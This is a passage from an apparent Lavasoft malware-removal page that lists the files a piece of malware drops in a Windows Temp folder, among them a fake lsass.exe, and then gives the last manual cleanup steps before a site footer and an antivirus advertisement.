    %Documents and Settings%\%current user%\Local Settings\Temp\downt\AplusFile.bt (1136 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\kjtqt.exe (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\lsass.exe (12088 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\downt\mainpage32.zip (5733 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\downt\common.zip (130989 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\ProjPack.xml (1701 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\appeight.exe (56684 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now